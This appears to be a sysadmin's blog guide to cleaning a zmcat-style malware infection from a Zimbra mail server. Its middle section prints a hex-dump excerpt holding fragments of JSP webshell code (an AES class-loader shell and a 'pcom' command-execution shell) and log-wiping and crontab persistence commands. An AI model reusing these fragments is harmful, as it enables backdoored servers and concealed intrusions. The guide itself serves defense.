Skip to content

Yet another zmcat or counterpart cleaning guide for Zimbra

This zmcat derivative attack and attacker is very specialized for zimbra.Alot of files seem to be part of zimbra located different path, interestingly there isn't any unexpected files /tmp folder.And something in background clean/edit most of log files.

So firstly we are starting to lock crontab files.Because something running background, checking and overwrite cron file even every second!!!Some zimbra services fall down due of  uncontrolled i/o activity.
chattr +i /var/spool/cron/crontabs/zimbra

Then inspecting all the records not end of the lines in the crontab file.Some records looking zimbra's own services, but really it's NOT!
For example 'zmmysqlstatus' is part of zimbra but real zmmysqlstatus is a perl scipt located in /opt/zimbra/bin, fake zmmysqlstatus is in the /opt/zimbra/libexec path is a executable binary file.Filenames like zmtrainsa, zmstat etc.They can be everywhere!!

Now we are detecting suspected binary files using an hex editor like Bless. And we found something like below, include attackers lifework.

  rb  wb+ wb /proc/self/exe    ' | awk '{print $2}' | xargs kill -9 > /dev/null 2>&1;  ps aux | grep -v grep | grep ' touch -r     > /dev/null 2>&1 nohup   > /dev/null 2>&1 & ' / r /proc/%s %d (crontab -l |grep -v ' )|crontab -    crontab -l | grep -v grep | grep ' sed -i -E '/ ( )| /d'  /opt/zimbra/log/ .pid %Y/%m/%d f****************h - -     chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads delete: %s failed!
delete: %s successfully.
   /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp /Alert.jsp /Zimbra.jsp ")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>   <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request
.getParameter("     /opt/zimbra/jetty/webapps/zimbra/public/jsp /CryptCore.jsp /Crypt.jsp   "
.getParameter("ppwd"))){ in = Runtime.getRuntime()
.exec(new String[]{"/bin/sh","-c", request
.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((!=-1){out.print(new String(b,0,a));}out.print("</pre>");}else{out.print("</pre>");}%> <%if
(" write %s: successfully.
write %s: failed!
%s: exist.
zmstorewatch /tmp/ tor2web. wget curl /opt/zimbra/lib/ XZimbra\.jsp Ajax\.jsp attachment_blocked\.jsp Core Debug\.jsp static\.jsp ppwd= 66\.04 /opt/zimbra/log/*_log.20     /opt/zimbra/log/nginx.access.log history -c > /dev/null 2>&1 zmqueuelog /opt/zimbra/bin/ zmmysqlstatus /opt/zimbra/libexec/ /opt/zimbra/lib/ swatchdog zmclientcertmgr /opt/zimbra/bin zmtrainsa watchdog /opt/zimbra/common/bin/ zmstat /opt/zimbra/zmstat/ lwatchdog  Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk /tmp/.cache zmmailboxdwatch /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp   /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp        /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp       /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp      /opt/zimbra/jetty/webapps/zimbra/public/jsp/Online.jsp  /opt/zimbra/jetty/webapps/zimbra/public/404.jsp /opt/zimbra/conf/zmsstorewatch.cnf /opt/zimbra/conf/zmsstore.cnf        /opt/zimbra/lib/zmmailboxdwatch /opt/zimbra/lib/zmstorewatch /tmp/.cache/.ntp /tmp/.cache/.kthrotlds   ÿÿÿ

There is alot of payloads, system object files,binary executables, some scripts mostly appends end of  your real files or completely fake .jsp files.Especially if you found some binary files start with UPX in hex editor, you are on the right way.

Now we are using 'top' command and looking for find something running background.Then check process path(real or fake) and if positive kill process

pwdx <PID>

kill <PID>

Repeat this process for every suspected cron records.Notice all those file names or scripts.

All of these process running under zimbra user.You can use pkill close all zimbra process and shutdown your mail service.But you are sure nothing infected working or kill them one by one.

pkill -u zimbra

Now unlock cron file and delete unwanted lines using text editor like nano.

chattr -i /var/spool/cron/crontabs/zimbra
cp /var/spool/cron/crontabs/zimbra /var/spool/cron/crontabs/zimbra_copy 
nano /var/spool/cron/crontabs/zimbra

Save changes and review cron file again.If something working background it will overwrite the file.

I assume everything is okay.Now lock cron file again.

chattr +i /var/spool/cron/crontabs/zimbra

If you used pkill -u zimbra,  you need to restart your mail server.

su zimbra
zmcontrol restart

Check your services, they should work well.

zmcontrol status

Then delete all noticed files but not directly, copy a temp directory.Check end of .jsp files, delete infected lines.Restart your mail server, wait two minutes and check status.If everything is okay, this meaning you cleaned your servers.Then download and install patch for your installation release from here.

Lastly don't forget change password.


No Trackbacks


Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

Form options

Submitted comments will be subject to moderation before being displayed.

Free Web Hosting